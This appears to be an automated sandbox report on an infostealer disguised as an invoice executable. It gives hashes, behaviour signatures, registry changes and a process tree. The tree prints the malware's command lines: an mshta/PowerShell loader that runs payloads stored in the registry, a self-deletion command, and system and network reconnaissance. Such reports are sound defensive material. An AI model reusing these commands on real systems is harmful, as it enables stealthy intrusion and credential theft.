Analysis
-
max time kernel
134s -
max time network
149s -
platform
windows7_x64 -
resource
win7 -
submitted
05-10-2020 14:39
Static task
static1
Behavioral task
behavioral1
Sample
invoice_96733093_10.20.zip.exe
Resource
win7
0 signatures
0 seconds
General
-
Target
invoice_96733093_10.20.zip.exe
-
Size
327KB
-
MD5
ff449329c25e3baa889cf72a5ccb9473
-
SHA1
d973b0267c639359cbcd8828e8f8e5a78ad85e80
-
SHA256
303516a866cfe388024135d1e3825f7b3e14e8f75d0b609ed5397b704697b8f7
-
SHA512
e535b33d86549dc51429ba575cfa3d02d1617dbbc5c697bbcf71cf6080055d0b8e54cce93e3784f7235e875ebbd4a2da82956547b87bc38ce8e0f2b2201d0637
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 608 259362972.exe -
Deletes itself 1 IoCs
pid Process 968 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 1464 set thread context of 1248 1464 powershell.exe 20 PID 1248 set thread context of 1920 1248 Explorer.EXE 29 PID 1248 set thread context of 968 1248 Explorer.EXE 42 PID 968 set thread context of 1792 968 cmd.exe 44 PID 1248 set thread context of 908 1248 Explorer.EXE 59 PID 1248 set thread context of 608 1248 Explorer.EXE 62 PID 1568 set thread context of 1248 1568 powershell.exe 20 PID 1248 set thread context of 1920 1248 Explorer.EXE 29 PID 1248 set thread context of 1444 1248 Explorer.EXE 101 PID 1444 set thread context of 852 1444 cmd.exe 103 -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 832 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1500 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1856 systeminfo.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006ec63bc8ce82ca42842facd57f52e30500000000020000000000106600000001000020000000ddd0b36e79793190d4b69d1d634d27c07b1fb227baa588573851771e1ed527fb000000000e8000000002000020000000ca949ca9fb8764594b501fa1810c9306fd9ef6c43b184b17dd8d753f33f291ad9000000014d5dd2a2c0e3b4b94bd19bb19283a71a9911bba787b3e28c6e7f2fd4fab478bc75e230fb5cfdd060104e1df3e7e9b422926a01c986599f58c24a52dd32b2269bd5f66783ed784d730e3b4b114f90defc4511642cb936a4fc4126c855650c4f19ee3832855d50e788af560c3dad1e1c50869822ac27ac9d7c6cc83f3f76b596bca2d226233aad105911e3df777fd8aba400000006e5fe5c3261f017a815fc012054a12c4edae9cff83b7c0855e3fe7405a04059b3b5e2c734c89ac2f48b875833814e0693dc0381f1317f55ed2a9bec7fb93a8f1 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006ec63bc8ce82ca42842facd57f52e30500000000020000000000106600000001000020000000f813322f121850ec65ca3b9a5e45e99c3dfd37e05c70edd2d2ee7c02b65828af000000000e800000000200002000000073847ebe1fac2deca804aca9e542d6cf4948917a2ccfeae891aa650391b5743320000000d200495818f983b96c85433eb76c34d8eadf7b32c6d48338ce1085da68b1c850400000003f07a3e4baef4dc28e584ad67e37a29c73c47344c487d39de924c204683882ee4702612742756f896e55913bd3a7699716d3288614152b8198875a455ee7fbc4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4619D331-0719-11EB-80FF-66F447F6D2D2} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "308674045" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0b4bd0c269bd601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 852 PING.EXE 1792 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 1792 PING.EXE 852 PING.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1156 invoice_96733093_10.20.zip.exe 1464 powershell.exe 1464 powershell.exe 1248 Explorer.EXE 608 259362972.exe 1568 powershell.exe 1568 powershell.exe 1248 Explorer.EXE -
Suspicious behavior: MapViewOfSection 10 IoCs
pid Process 1464 powershell.exe 1248 Explorer.EXE 1248 Explorer.EXE 968 cmd.exe 1248 Explorer.EXE 1248 Explorer.EXE 1568 powershell.exe 1248 Explorer.EXE 1248 Explorer.EXE 1444 cmd.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 1500 tasklist.exe Token: SeShutdownPrivilege 1248 Explorer.EXE Token: SeShutdownPrivilege 1248 Explorer.EXE Token: SeDebugPrivilege 1568 powershell.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1920 iexplore.exe 1920 iexplore.exe 1920 iexplore.exe 1920 iexplore.exe 1920 iexplore.exe 1920 iexplore.exe -
Suspicious use of SetWindowsHookEx 26 IoCs
pid Process 1920 iexplore.exe 1920 iexplore.exe 268 IEXPLORE.EXE 268 IEXPLORE.EXE 1920 iexplore.exe 1920 iexplore.exe 976 IEXPLORE.EXE 976 IEXPLORE.EXE 1920 iexplore.exe 1920 iexplore.exe 268 IEXPLORE.EXE 268 IEXPLORE.EXE 1248 Explorer.EXE 1920 iexplore.exe 1920 iexplore.exe 268 IEXPLORE.EXE 268 IEXPLORE.EXE 1920 iexplore.exe 1920 iexplore.exe 268 IEXPLORE.EXE 268 IEXPLORE.EXE 1920 iexplore.exe 1920 iexplore.exe 268 IEXPLORE.EXE 268 IEXPLORE.EXE 1248 Explorer.EXE -
Suspicious use of WriteProcessMemory 187 IoCs
description pid Process procid_target PID 1920 wrote to memory of 268 1920 iexplore.exe 31 PID 1920 wrote to memory of 268 1920 iexplore.exe 31 PID 1920 wrote to memory of 268 1920 iexplore.exe 31 PID 1920 wrote to memory of 268 1920 iexplore.exe 31 PID 1920 wrote to memory of 976 1920 iexplore.exe 33 PID 1920 wrote to memory of 976 1920 iexplore.exe 33 PID 1920 wrote to memory of 976 1920 iexplore.exe 33 PID 1920 wrote to memory of 976 1920 iexplore.exe 33 PID 980 wrote to memory of 1464 980 mshta.exe 36 PID 980 wrote to memory of 1464 980 mshta.exe 36 PID 980 wrote to memory of 1464 980 mshta.exe 36 PID 1464 wrote to memory of 1116 1464 powershell.exe 38 PID 1464 wrote to memory of 1116 1464 powershell.exe 38 PID 1464 wrote to memory of 1116 1464 powershell.exe 38 PID 1116 wrote to memory of 240 1116 csc.exe 39 PID 1116 wrote to memory of 240 1116 csc.exe 39 PID 1116 wrote to memory of 240 1116 csc.exe 39 PID 1464 wrote to memory of 1440 1464 powershell.exe 40 PID 1464 wrote to memory of 1440 1464 powershell.exe 40 PID 1464 wrote to memory of 1440 1464 powershell.exe 40 PID 1440 wrote to memory of 1608 1440 csc.exe 41 PID 1440 wrote to memory of 1608 1440 csc.exe 41 PID 1440 wrote to memory of 1608 1440 csc.exe 41 PID 1464 wrote to memory of 1248 1464 powershell.exe 20 PID 1464 wrote to memory of 1248 1464 powershell.exe 20 PID 1464 wrote to memory of 1248 1464 powershell.exe 20 PID 1248 wrote to memory of 1920 1248 Explorer.EXE 29 PID 1248 wrote to memory of 968 1248 Explorer.EXE 42 PID 1248 wrote to memory of 968 1248 Explorer.EXE 42 PID 1248 wrote to memory of 968 1248 Explorer.EXE 42 PID 1248 wrote to memory of 968 1248 Explorer.EXE 42 PID 1248 wrote to memory of 1920 1248 Explorer.EXE 29 PID 1248 wrote to memory of 1920 1248 Explorer.EXE 29 PID 1248 wrote to memory of 968 1248 Explorer.EXE 42 PID 1248 wrote to memory of 968 1248 Explorer.EXE 42 PID 968 wrote to memory of 1792 968 cmd.exe 44 PID 968 wrote to memory of 1792 968 cmd.exe 44 PID 968 wrote to memory of 1792 968 cmd.exe 44 PID 968 wrote to memory of 1792 968 cmd.exe 44 PID 968 wrote to memory of 1792 968 cmd.exe 44 PID 968 wrote to memory of 1792 968 cmd.exe 44 PID 1248 wrote to memory of 1220 1248 Explorer.EXE 45 PID 1248 wrote to memory of 1220 1248 Explorer.EXE 45 PID 1248 wrote to memory of 1220 1248 Explorer.EXE 45 PID 1248 wrote to memory of 1516 1248 Explorer.EXE 47 PID 1248 wrote to memory of 1516 1248 Explorer.EXE 47 PID 1248 wrote to memory of 1516 1248 Explorer.EXE 47 PID 1220 wrote to memory of 1620 1220 cmd.exe 49 PID 1220 wrote to memory of 1620 1220 cmd.exe 49 PID 1220 wrote to memory of 1620 1220 cmd.exe 49 PID 1516 wrote to memory of 1652 1516 cmd.exe 50 PID 1516 wrote to memory of 1652 1516 cmd.exe 50 PID 1516 wrote to memory of 1652 1516 cmd.exe 50 PID 1248 wrote to memory of 1336 1248 Explorer.EXE 51 PID 1248 wrote to memory of 1336 1248 Explorer.EXE 51 PID 1248 wrote to memory of 1336 1248 Explorer.EXE 51 PID 1248 wrote to memory of 608 1248 Explorer.EXE 53 PID 1248 wrote to memory of 608 1248 Explorer.EXE 53 PID 1248 wrote to memory of 608 1248 Explorer.EXE 53 PID 1248 wrote to memory of 1452 1248 Explorer.EXE 55 PID 1248 wrote to memory of 1452 1248 Explorer.EXE 55 PID 1248 wrote to memory of 1452 1248 Explorer.EXE 55 PID 1452 wrote to memory of 1856 1452 cmd.exe 57 PID 1452 wrote to memory of 1856 1452 cmd.exe 57 PID 1452 wrote to memory of 1856 1452 cmd.exe 57 PID 1248 wrote to memory of 908 1248 Explorer.EXE 59 PID 1248 wrote to memory of 908 1248 Explorer.EXE 59 PID 1248 wrote to memory of 908 1248 Explorer.EXE 59 PID 1248 wrote to memory of 908 1248 Explorer.EXE 59 PID 1248 wrote to memory of 908 1248 Explorer.EXE 59 PID 1248 wrote to memory of 908 1248 Explorer.EXE 59 PID 1248 wrote to memory of 908 1248 Explorer.EXE 59 PID 1248 wrote to memory of 608 1248 Explorer.EXE 62 PID 1248 wrote to memory of 608 1248 Explorer.EXE 62 PID 1248 wrote to memory of 608 1248 Explorer.EXE 62 PID 1248 wrote to memory of 608 1248 Explorer.EXE 62 PID 1248 wrote to memory of 608 1248 Explorer.EXE 62 PID 1248 wrote to memory of 608 1248 Explorer.EXE 62 PID 1248 wrote to memory of 608 1248 Explorer.EXE 62 PID 1248 wrote to memory of 668 1248 Explorer.EXE 63 PID 1248 wrote to memory of 668 1248 Explorer.EXE 63 PID 1248 wrote to memory of 668 1248 Explorer.EXE 63 PID 1248 wrote to memory of 1500 1248 Explorer.EXE 65 PID 1248 wrote to memory of 1500 1248 Explorer.EXE 65 PID 1248 wrote to memory of 1500 1248 Explorer.EXE 65 PID 1500 wrote to memory of 832 1500 cmd.exe 67 PID 1500 wrote to memory of 832 1500 cmd.exe 67 PID 1500 wrote to memory of 832 1500 cmd.exe 67 PID 1248 wrote to memory of 456 1248 Explorer.EXE 68 PID 1248 wrote to memory of 456 1248 Explorer.EXE 68 PID 1248 wrote to memory of 456 1248 Explorer.EXE 68 PID 1248 wrote to memory of 668 1248 Explorer.EXE 70 PID 1248 wrote to memory of 668 1248 Explorer.EXE 70 PID 1248 wrote to memory of 668 1248 Explorer.EXE 70 PID 668 wrote to memory of 1156 668 cmd.exe 72 PID 668 wrote to memory of 1156 668 cmd.exe 72 PID 668 wrote to memory of 1156 668 cmd.exe 72 PID 1248 wrote to memory of 592 1248 Explorer.EXE 73 PID 1248 wrote to memory of 592 1248 Explorer.EXE 73 PID 1248 wrote to memory of 592 1248 Explorer.EXE 73 PID 1248 wrote to memory of 1832 1248 Explorer.EXE 75 PID 1248 wrote to memory of 1832 1248 Explorer.EXE 75 PID 1248 wrote to memory of 1832 1248 Explorer.EXE 75 PID 1832 wrote to memory of 1500 1832 cmd.exe 77 PID 1832 wrote to memory of 1500 1832 cmd.exe 77 PID 1832 wrote to memory of 1500 1832 cmd.exe 77 PID 1248 wrote to memory of 1244 1248 Explorer.EXE 78 PID 1248 wrote to memory of 1244 1248 Explorer.EXE 78 PID 1248 wrote to memory of 1244 1248 Explorer.EXE 78 PID 1248 wrote to memory of 1640 1248 Explorer.EXE 80 PID 1248 wrote to memory of 1640 1248 Explorer.EXE 80 PID 1248 wrote to memory of 1640 1248 Explorer.EXE 80 PID 1640 wrote to memory of 668 1640 cmd.exe 82 PID 1640 wrote to memory of 668 1640 cmd.exe 82 PID 1640 wrote to memory of 668 1640 cmd.exe 82 PID 1248 wrote to memory of 1060 1248 Explorer.EXE 83 PID 1248 wrote to memory of 1060 1248 Explorer.EXE 83 PID 1248 wrote to memory of 1060 1248 Explorer.EXE 83 PID 1248 wrote to memory of 1500 1248 Explorer.EXE 85 PID 1248 wrote to memory of 1500 1248 Explorer.EXE 85 PID 1248 wrote to memory of 1500 1248 Explorer.EXE 85 PID 1500 wrote to memory of 2000 1500 cmd.exe 87 PID 1500 wrote to memory of 2000 1500 cmd.exe 87 PID 1500 wrote to memory of 2000 1500 cmd.exe 87 PID 1248 wrote to memory of 760 1248 Explorer.EXE 88 PID 1248 wrote to memory of 760 1248 Explorer.EXE 88 PID 1248 wrote to memory of 760 1248 Explorer.EXE 88 PID 1248 wrote to memory of 1716 1248 Explorer.EXE 90 PID 1248 wrote to memory of 1716 1248 Explorer.EXE 90 PID 1248 wrote to memory of 1716 1248 Explorer.EXE 90 PID 1248 wrote to memory of 1060 1248 Explorer.EXE 92 PID 1248 wrote to memory of 1060 1248 Explorer.EXE 92 PID 1248 wrote to memory of 1060 1248 Explorer.EXE 92 PID 1248 wrote to memory of 848 1248 Explorer.EXE 94 PID 1248 wrote to memory of 848 1248 Explorer.EXE 94 PID 1248 wrote to memory of 848 1248 Explorer.EXE 94 PID 848 wrote to memory of 1568 848 mshta.exe 95 PID 848 wrote to memory of 1568 848 mshta.exe 95 PID 848 wrote to memory of 1568 848 mshta.exe 95 PID 1568 wrote to memory of 456 1568 powershell.exe 97 PID 1568 wrote to memory of 456 1568 powershell.exe 97 PID 1568 wrote to memory of 456 1568 powershell.exe 97 PID 456 wrote to memory of 1896 456 csc.exe 98 PID 456 wrote to memory of 1896 456 csc.exe 98 PID 456 wrote to memory of 1896 456 csc.exe 98 PID 1568 wrote to memory of 1716 1568 powershell.exe 99 PID 1568 wrote to memory of 1716 1568 powershell.exe 99 PID 1568 wrote to memory of 1716 1568 powershell.exe 99 PID 1716 wrote to memory of 1240 1716 csc.exe 100 PID 1716 wrote to memory of 1240 1716 csc.exe 100 PID 1716 wrote to memory of 1240 1716 csc.exe 100 PID 1568 wrote to memory of 1248 1568 powershell.exe 20 PID 1568 wrote to memory of 1248 1568 powershell.exe 20 PID 1568 wrote to memory of 1248 1568 powershell.exe 20 PID 1248 wrote to memory of 1920 1248 Explorer.EXE 29 PID 1248 wrote to memory of 1444 1248 Explorer.EXE 101 PID 1248 wrote to memory of 1444 1248 Explorer.EXE 101 PID 1248 wrote to memory of 1444 1248 Explorer.EXE 101 PID 1248 wrote to memory of 1444 1248 Explorer.EXE 101 PID 1248 wrote to memory of 1920 1248 Explorer.EXE 29 PID 1248 wrote to memory of 1920 1248 Explorer.EXE 29 PID 1248 wrote to memory of 1444 1248 Explorer.EXE 101 PID 1248 wrote to memory of 1444 1248 Explorer.EXE 101 PID 1444 wrote to memory of 852 1444 cmd.exe 103 PID 1444 wrote to memory of 852 1444 cmd.exe 103 PID 1444 wrote to memory of 852 1444 cmd.exe 103 PID 1444 wrote to memory of 852 1444 cmd.exe 103 PID 1444 wrote to memory of 852 1444 cmd.exe 103 PID 1444 wrote to memory of 852 1444 cmd.exe 103 PID 1248 wrote to memory of 648 1248 Explorer.EXE 104 PID 1248 wrote to memory of 648 1248 Explorer.EXE 104 PID 1248 wrote to memory of 648 1248 Explorer.EXE 104 PID 1248 wrote to memory of 1244 1248 Explorer.EXE 105 PID 1248 wrote to memory of 1244 1248 Explorer.EXE 105 PID 1248 wrote to memory of 1244 1248 Explorer.EXE 105 PID 648 wrote to memory of 1660 648 cmd.exe 108 PID 648 wrote to memory of 1660 648 cmd.exe 108 PID 648 wrote to memory of 1660 648 cmd.exe 108 PID 1244 wrote to memory of 1496 1244 cmd.exe 109 PID 1244 wrote to memory of 1496 1244 cmd.exe 109 PID 1244 wrote to memory of 1496 1244 cmd.exe 109 PID 1248 wrote to memory of 432 1248 Explorer.EXE 110 PID 1248 wrote to memory of 432 1248 Explorer.EXE 110 PID 1248 wrote to memory of 432 1248 Explorer.EXE 110 PID 1248 wrote to memory of 960 1248 Explorer.EXE 112 PID 1248 wrote to memory of 960 1248 Explorer.EXE 112 PID 1248 wrote to memory of 960 1248 Explorer.EXE 112
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\invoice_96733093_10.20.zip.exe"C:\Users\Admin\AppData\Local\Temp\invoice_96733093_10.20.zip.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1156
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\CAF07543-A1A9-8CB6-7B9E-6580DFB269B4\\\Clicring'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\CAF07543-A1A9-8CB6-7B9E-6580DFB269B4").comsclen))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i5gk4dxt\i5gk4dxt.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D3B.tmp" "c:\Users\Admin\AppData\Local\Temp\i5gk4dxt\CSCCE427DB22D444A2EA7DA3DABA0C47FFF.TMP"5⤵PID:240
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o3hg4xrf\o3hg4xrf.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DC7.tmp" "c:\Users\Admin\AppData\Local\Temp\o3hg4xrf\CSCAA0395707E3B4D47B7A02D552DFAB1E9.TMP"5⤵PID:1608
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\invoice_96733093_10.20.zip.exe"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1792
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\144C.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1620
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\3D54.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1652
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3D54.bi1"2⤵PID:1336
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\144C.bi1"2⤵PID:608
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:1856
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:908
-
-
C:\Users\Admin\AppData\Local\Temp\259362972.exe"C:\Users\Admin\AppData\Local\Temp\259362972.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:608
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:668
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:1500
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:832
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:456
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:668
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:1156
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:592
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:1832
-
